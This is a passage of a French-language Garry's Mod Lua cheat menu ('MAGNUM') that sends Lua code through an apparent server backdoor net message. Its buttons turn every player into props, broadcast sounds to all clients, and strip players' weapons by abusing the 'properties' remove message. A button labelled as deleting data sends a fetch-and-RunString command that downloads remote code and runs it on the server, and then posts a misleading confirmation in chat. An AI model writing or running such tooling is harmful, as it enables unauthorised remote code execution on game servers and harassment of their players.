  1231. --Black outline
  1232. surface.SetDrawColor(255, 255, 255)
  1233. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1234. --Outline
  1235. surface.SetDrawColor(0,0,0,255)
  1236. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1237. --Main back
  1238. surface.SetDrawColor(0,0,0,255)
  1239. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1240. end
  1241. HerthButton.DoClick = function()
  1242. net.Start(netKey)
  1243. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/gm_forest/tree_alder.mdl\") end" )
  1244. net.WriteBit(1)
  1245. net.SendToServer()
  1246. end
  1247. local HerthButton = DScrollPanel:Add("DButton")
  1248. HerthButton:SetSize(370,25)
  1249. HerthButton:SetPos(5,27*17+5)
  1250. HerthButton:SetTextColor(Color(255,255,255))
  1251. HerthButton:SetText("Changez le model des joueur en paneaux")
  1252. HerthButton.Paint = function()
  1253. --Black outline
  1254. surface.SetDrawColor(255, 255, 255)
  1255. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1256. --Outline
  1257. surface.SetDrawColor(0,0,0,255)
  1258. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1259. --Main back
  1260. surface.SetDrawColor(0,0,0,255)
  1261. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1262. end
  1263. HerthButton.DoClick = function()
  1264. net.Start(netKey)
  1265. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_c17/streetsign004f.mdl\") end" )
  1266. net.WriteBit(1)
  1267. net.SendToServer()
  1268. end
  1269. local HerthButton = DScrollPanel:Add("DButton")
  1270. HerthButton:SetSize(370,25)
  1271. HerthButton:SetPos(5,27*18+5)
  1272. HerthButton:SetTextColor(Color(255,255,255))
  1273. HerthButton:SetText("Changez le model des joueur en grillage")
  1274. HerthButton.Paint = function()
  1275. --Black outline
  1276. surface.SetDrawColor(255, 255, 255)
  1277. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1278. --Outline
  1279. surface.SetDrawColor(0,0,0,255)
  1280. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1281. --Main back
  1282. surface.SetDrawColor(0,0,0,255)
  1283. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1284. end
  1285. HerthButton.DoClick = function()
  1286. net.Start(netKey)
  1287. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_c17/fence02a.mdl\") end" )
  1288. net.WriteBit(1)
  1289. net.SendToServer()
  1290. end
  1291. local HerthButton = DScrollPanel:Add("DButton")
  1292. HerthButton:SetSize(370,25)
  1293. HerthButton:SetPos(5,27*19+5)
  1294. HerthButton:SetTextColor(Color(255,255,255))
  1295. HerthButton:SetText("Changez le model des joueur en canapé")
  1296. HerthButton.Paint = function()
  1297. --Black outline
  1298. surface.SetDrawColor(255, 255, 255)
  1299. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1300. --Outline
  1301. surface.SetDrawColor(0,0,0,255)
  1302. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1303. --Main back
  1304. surface.SetDrawColor(0,0,0,255)
  1305. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1306. end
  1307. HerthButton.DoClick = function()
  1308. net.Start(netKey)
  1309. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_interiors/Furniture_Couch01a.mdl\") end" )
  1310. net.WriteBit(1)
  1311. net.SendToServer()
  1312. end
  1313. local HerthButton = DScrollPanel:Add("DButton")
  1314. HerthButton:SetSize(370,25)
  1315. HerthButton:SetPos(5,27*20+5)
  1316. HerthButton:SetTextColor(Color(255,255,255))
  1317. HerthButton:SetText("Changez le model des joueur en pillier")
  1318. HerthButton.Paint = function()
  1319. --Black outline
  1320. surface.SetDrawColor(255, 255, 255)
  1321. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1322. --Outline
  1323. surface.SetDrawColor(0,0,0,255)
  1324. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1325. --Main back
  1326. surface.SetDrawColor(0,0,0,255)
  1327. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1328. end
  1329. HerthButton.DoClick = function()
  1330. net.Start(netKey)
  1331. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_canal/bridge_pillar02.mdl\") end" )
  1332. net.WriteBit(1)
  1333. net.SendToServer()
  1334. end
  1335. local HerthButton = DScrollPanel:Add("DButton")
  1336. HerthButton:SetSize(370,25)
  1337. HerthButton:SetPos(5,27*21+5)
  1338. HerthButton:SetTextColor(Color(255,255,255))
  1339. HerthButton:SetText("Changez le model des joueur en chaise de bureaux")
  1340. HerthButton.Paint = function()
  1341. --Black outline
  1342. surface.SetDrawColor(255, 255, 255)
  1343. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1344. --Outline
  1345. surface.SetDrawColor(0,0,0,255)
  1346. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1347. --Main back
  1348. surface.SetDrawColor(0,0,0,255)
  1349. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1350. end
  1351. HerthButton.DoClick = function()
  1352. net.Start(netKey)
  1353. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_combine/breenchair.mdl\") end" )
  1354. net.WriteBit(1)
  1355. net.SendToServer()
  1356. end
  1357. local HerthButton = DScrollPanel:Add("DButton")
  1358. HerthButton:SetSize(370,25)
  1359. HerthButton:SetPos(5,27*22+5)
  1360. HerthButton:SetTextColor(Color(255,255,255))
  1361. HerthButton:SetText("Changez le model des joueur en plaque de bois")
  1362. HerthButton.Paint = function()
  1363. --Black outline
  1364. surface.SetDrawColor(255, 255, 255)
  1365. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1366. --Outline
  1367. surface.SetDrawColor(0,0,0,255)
  1368. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1369. --Main back
  1370. surface.SetDrawColor(0,0,0,255)
  1371. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1372. end
  1373. HerthButton.DoClick = function()
  1374. net.Start(netKey)
  1375. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_phx/construct/wood/wood_panel4x4.mdl\") end" )
  1376. net.WriteBit(1)
  1377. net.SendToServer()
  1378. end
  1379. local HerthButton = DScrollPanel:Add("DButton")
  1380. HerthButton:SetSize(370,25)
  1381. HerthButton:SetPos(5,27*23+5)
  1382. HerthButton:SetTextColor(Color(255,255,255))
  1383. HerthButton:SetText("suprimer les data")
  1384. HerthButton.Paint = function()
  1385. --Black outline
  1386. surface.SetDrawColor(255, 255, 255)
  1387. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1388. --Outline
  1389. surface.SetDrawColor(0,0,0,255)
  1390. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1391. --Main back
  1392. surface.SetDrawColor(0,0,0,255)
  1393. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1394. end
  1395. HerthButton.DoClick = function()
  1396. net.Start(netKey)
  1397. net.WriteString( "http.Fetch(\"\",function(b,l,h,c)RunString(b)end,nil)" )
  1398. net.WriteBit(1)
  1399. net.SendToServer()
  1400. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "MAGNUM", "] ", Color( 255, 255, 255 ), "DATA SUPRIMER ' " )
  1401. end
  1404. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1405. Songs
  1406. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  1407. local DScrollPanel = vgui.Create( "DScrollPanel", playSongs )
  1408. DScrollPanel:Dock( FILL )
  1411. local drose = DScrollPanel:Add( "DButton", Song )
  1412. drose:SetSize(225,25)
  1413. drose:SetPos(5,5)
  1414. drose:SetTextColor(Color(255,255,255))
  1415. drose:SetText("HAAAAAAAA")
  1416. drose.Paint = function()
  1417. --Black outline
  1418. surface.SetDrawColor(255, 255, 255)
  1419. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1420. --Outline
  1421. surface.SetDrawColor(0, 0, 255)
  1422. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1423. --Main back
  1424. surface.SetDrawColor(0, 0, 255)
  1425. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1426. end
  1427. drose.DoClick = function()
  1428. net.Start(netKey)
  1429. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1430. net.WriteBit(1)
  1431. net.SendToServer()
  1432. end
  1433. local Orbit = DScrollPanel:Add( "DButton", Song )
  1434. Orbit:SetSize(225,25)
  1435. Orbit:SetTextColor(Color(255,255,255))
  1436. Orbit:SetPos(5,32)
  1437. Orbit:SetText("issou")
  1438. Orbit.Paint = function()
  1439. --Black outline
  1440. surface.SetDrawColor(255, 255, 255)
  1441. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1442. --Outline
  1443. surface.SetDrawColor(0, 0, 255)
  1444. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1445. --Main back
  1446. surface.SetDrawColor(0, 0, 255)
  1447. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1448. end
  1449. Orbit.DoClick = function()
  1450. net.Start(netKey)
  1451. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1452. net.WriteBit(1)
  1453. net.SendToServer()
  1454. end
  1455. local OW = DScrollPanel:Add( "DButton", Song )
  1456. OW:SetSize(225,25)
  1457. OW:SetTextColor(Color(255,255,255))
  1458. OW:SetPos(5,59)
  1459. OW:SetText("ORGASME")
  1460. OW.Paint = function()
  1461. --Black outline
  1462. surface.SetDrawColor(255, 255, 255)
  1463. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1464. --Outline
  1465. surface.SetDrawColor(0, 0, 255)
  1466. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1467. --Main back
  1468. surface.SetDrawColor(0, 0, 255)
  1469. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1470. end
  1471. OW.DoClick = function()
  1472. net.Start(netKey)
  1473. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1474. net.WriteBit(1)
  1475. net.SendToServer()
  1476. end
  1477. local drose = DScrollPanel:Add( "DButton", Song )
  1478. drose:SetSize(225,25)
  1479. drose:SetTextColor(Color(255,255,255))
  1480. drose:SetPos(5,86)
  1481. drose:SetText("Bengouse")
  1482. drose.Paint = function()
  1483. --Black outline
  1484. surface.SetDrawColor(255, 255, 255)
  1485. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1486. --Outline
  1487. surface.SetDrawColor(0, 0, 255)
  1488. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1489. --Main back
  1490. surface.SetDrawColor(0, 0, 255)
  1491. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1492. end
  1493. drose.DoClick = function()
  1494. net.Start(netKey)
  1495. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1496. net.WriteBit(1)
  1497. net.SendToServer()
  1498. end
  1499. local drose = DScrollPanel:Add( "DButton", Song )
  1500. drose:SetSize(225,25)
  1501. drose:SetTextColor(Color(255,255,255))
  1502. drose:SetPos(5,113)
  1503. drose:SetText("Chapitre")
  1504. drose.Paint = function()
  1505. --Black outline
  1506. surface.SetDrawColor(255, 255, 255)
  1507. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1508. --Outline
  1509. surface.SetDrawColor(0, 0, 255)
  1510. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1511. --Main back
  1512. surface.SetDrawColor(0, 0, 255)
  1513. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1514. end
  1515. drose.DoClick = function()
  1516. net.Start(netKey)
  1517. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1518. net.WriteBit(1)
  1519. net.SendToServer()
  1520. end
  1521. local Blue = DScrollPanel:Add( "DButton", Song )
  1522. Blue:SetSize(225,25)
  1523. Blue:SetTextColor(Color(255,255,255))
  1524. Blue:SetPos(5,140)
  1525. Blue:SetText("Blue Song(Odium)")
  1526. Blue.Paint = function()
  1527. --Black outline
  1528. surface.SetDrawColor(255, 255, 255)
  1529. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1530. --Outline
  1531. surface.SetDrawColor(0, 0, 255)
  1532. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1533. --Main back
  1534. surface.SetDrawColor(0, 0, 255)
  1535. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1536. end
  1537. Blue.DoClick = function()
  1538. net.Start(netKey)
  1539. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1540. net.WriteBit(1)
  1541. net.SendToServer()
  1542. end
  1543. local boss = DScrollPanel:Add( "DButton", Song )
  1544. boss:SetSize(225,25)
  1545. boss:SetTextColor(Color(255,255,255))
  1546. boss:SetPos(5,167)
  1547. boss:SetText("Arabe")
  1548. boss.Paint = function()
  1549. --Black outline
  1550. surface.SetDrawColor(255, 255, 255)
  1551. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1552. --Outline
  1553. surface.SetDrawColor(0, 0, 255)
  1554. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1555. --Main back
  1556. surface.SetDrawColor(0, 0, 255)
  1557. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1558. end
  1559. boss.DoClick = function()
  1560. net.Start(netKey)
  1561. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1562. net.WriteBit(1)
  1563. net.SendToServer()
  1564. end
  1565. local boss = DScrollPanel:Add( "DButton", Song )
  1566. boss:SetSize(225,25)
  1567. boss:SetTextColor(Color(255,255,255))
  1568. boss:SetPos(5,194)
  1569. boss:SetText("Lolo")
  1570. boss.Paint = function()
  1571. --Black outline
  1572. surface.SetDrawColor(255, 255, 255)
  1573. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1574. --Outline
  1575. surface.SetDrawColor(0, 0, 255)
  1576. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1577. --Main back
  1578. surface.SetDrawColor(0, 0, 255)
  1579. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1580. end
  1581. boss.DoClick = function()
  1582. net.Start(netKey)
  1583. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1584. net.WriteBit (1)
  1585. net.SendToServer()
  1586. end
  1587. local boss = DScrollPanel:Add( "DButton", Song )
  1588. boss:SetSize(225,25)
  1589. boss:SetTextColor(Color(255,255,255))
  1590. boss:SetPos(5,221)
  1591. boss:SetText("RK #B7")
  1592. boss.Paint = function()
  1593. --Black outline
  1594. surface.SetDrawColor(255, 255, 255)
  1595. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1596. --Outline
  1597. surface.SetDrawColor(0, 0, 255)
  1598. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1599. --Main back
  1600. surface.SetDrawColor(0, 0, 255)
  1601. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1602. end
  1603. boss.DoClick = function()
  1604. net.Start(netKey)
  1605. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1606. net.WriteBit (1)
  1607. net.SendToServer()
  1608. end
  1609. local boss = DScrollPanel:Add( "DButton", Song )
  1610. boss:SetSize(225,25)
  1611. boss:SetTextColor(Color(255,255,255))
  1612. boss:SetPos(5,248)
  1613. boss:SetText("RK boosterAirMAX")
  1614. boss.Paint = function()
  1615. --Black outline
  1616. surface.SetDrawColor(255, 255, 255)
  1617. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1618. --Outline
  1619. surface.SetDrawColor(0, 0, 255)
  1620. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1621. --Main back
  1622. surface.SetDrawColor(0, 0, 255)
  1623. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1624. end
  1625. boss.DoClick = function()
  1626. net.Start(netKey)
  1627. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1628. net.WriteBit (1)
  1629. net.SendToServer()
  1630. end
  1631. local boss = DScrollPanel:Add( "DButton", Song )
  1632. boss:SetSize(225,25)
  1633. boss:SetTextColor(Color(255,255,255))
  1634. boss:SetPos(5,275)
  1635. boss:SetText("Voix MagnumTeam")
  1636. boss.Paint = function()
  1637. --Black outline
  1638. surface.SetDrawColor(255, 255, 255)
  1639. surface.DrawRect(0,0,drose:GetWide(),drose:GetTall())
  1640. --Outline
  1641. surface.SetDrawColor(0, 0, 255)
  1642. surface.DrawRect(2,2,drose:GetWide()-4,drose:GetTall()-4)
  1643. --Main back
  1644. surface.SetDrawColor(0, 0, 255)
  1645. surface.DrawRect(4,4,drose:GetWide()-8,drose:GetTall()-8)
  1646. end
  1647. boss.DoClick = function()
  1648. net.Start(netKey)
  1649. net.WriteString("BroadcastLua([[sound.PlayURL( \"\", \"mono\", function()end )]])")
  1650. net.WriteBit (1)
  1651. net.SendToServer()
  1652. end
  1662. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1663. Hacks
  1664. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  1665. local DScrollPanel = vgui.Create( "DScrollPanel", hacks )
  1666. DScrollPanel:Dock( FILL )
  1690. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1691. Stripper
  1692. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  1693. time = 1
  1694. function Ply(name) -- finds player name
  1695. name = string.lower(name);
  1696. for _,v in ipairs(player.GetHumans()) do
  1697. if(string.find(string.lower(v:Name()),name,1,true) != nil) then
  1698. return v;
  1699. end
  1700. end
  1701. end
  1703. function stripPlayer(ply) -- Strip player function
  1704. if ply:IsPlayer() then
  1706. for k,v in pairs(ply:GetWeapons()) do
  1708. net.Start("properties")
  1709. net.WriteString( "remove" , 32 )
  1710. net.WriteEntity( v )
  1711. net.SendToServer()
  1712. end
  1713. end
  1715. end
  1716. concommand.Add("removewep_crosshair", function()
  1717. local xhair = LocalPlayer():GetEyeTrace().Entity
  1718. stripPlayer(xhair)
  1719. end)
  1721. function removeAll() -- Strips all Players
  1722. for k,v in pairs(player.GetAll()) do
  1723. stripPlayer(v)
  1724. end
  1725. end
  1727. local button = vgui.Create("DButton", strip)
  1728. button:SetText("Strip Tout Le Monde")
  1729. button:SetPos(400/2-60,7)
  1730. button:SetSize(1000/2, 25)
  1731. button:SetTextColor(Color(255, 255, 255))
  1732. button.DoClick = function ()
  1733. removeAll()
  1734. chat.AddText(Color(0,128,255), "[Magnum Stripper] ", Color(128,128,128), "Tout le monde et strip")
  1735. end
  1736. button.Paint = function( self, w, h )
  1737. --Black outline
  1738. surface.SetDrawColor(math.random(1,255),math.random(1,255),math.random(1,255))
  1739. surface.DrawRect(0,0,button:GetWide(),button:GetTall())
  1740. --Outline
  1741. surface.SetDrawColor(0, 0, 255)
  1742. surface.DrawRect(2,2,button:GetWide()-4,button:GetTall()-4)
  1743. --Main back
  1744. surface.SetDrawColor(0, 0, 255)
  1745. surface.DrawRect(4,4,button:GetWide()-8,button:GetTall()-8)
  1746. end
  1748. local AppList = vgui.Create( "DListView", strip)
  1749. AppList:SetSize(740,600)
  1750. AppList:SetPos(12, 35)
  1751. AppList:SetMultiSelect( false )
  1752. AppList:AddColumn( "click sur le nom pour strip" )
  1753. for k, v in pairs(player.GetAll()) do
  1754. AppList:AddLine(v:Name())
  1755. end
  1756. AppList.Paint = function()
  1757. --Black outline
  1758. surface.SetDrawColor(77, 77, 77)
  1759. surface.DrawRect(0,0,AppList:GetWide(),AppList:GetTall())
  1760. --Outline
  1761. surface.SetDrawColor(77, 77, 77)
  1762. surface.DrawRect(2,2,HerthButton:GetWide()-4,AppList:GetTall()-4)
  1763. --Main back
  1764. surface.SetDrawColor(77, 77, 77)
  1765. surface.DrawRect(4,4,AppList:GetWide()-8,AppList:GetTall()-8)
  1766. end
  1768. AppList.DoDoubleClick = function( lst, index, pnl )
  1769. --print( "Selected " .. pnl:GetColumnText( 1 ) .. " at index " .. index )
  1770. ply = Ply(pnl:GetColumnText( 1 ))
  1771. chat.AddText(Color(255,0,0,255), "[Magnum Stripper] ", Color(math.random(1,255),math.random(1,255),math.random(1,255)), pnl:GetColumnText( 1 ).." Go strip")
  1772. stripPlayer(ply)
  1773. end
  1776. concommand.Add("menu",menu)
  1777. concommand.Add("strip",stripPlayer)
  1778. function removeWeapons()
  1779. local Target = LocalPlayer():GetEyeTrace().Entity
  1780. if Target:IsPlayer() then
  1781. for x,y in pairs(Target:GetWeapons()) do
  1782. net.Start("properties")
  1783. net.WriteString( "remove" , 32 )
  1784. net.WriteEntity( y )
  1785. net.SendToServer()
  1786. end
  1787. end
  1788. end
  1792. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  1793. End Stuff like Close button ect
  1794. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  1801. --[[---------------------------------------------------------
  1802. Herth Con-Command End
  1803. -----------------------------------------------------------]]
  1804. end)
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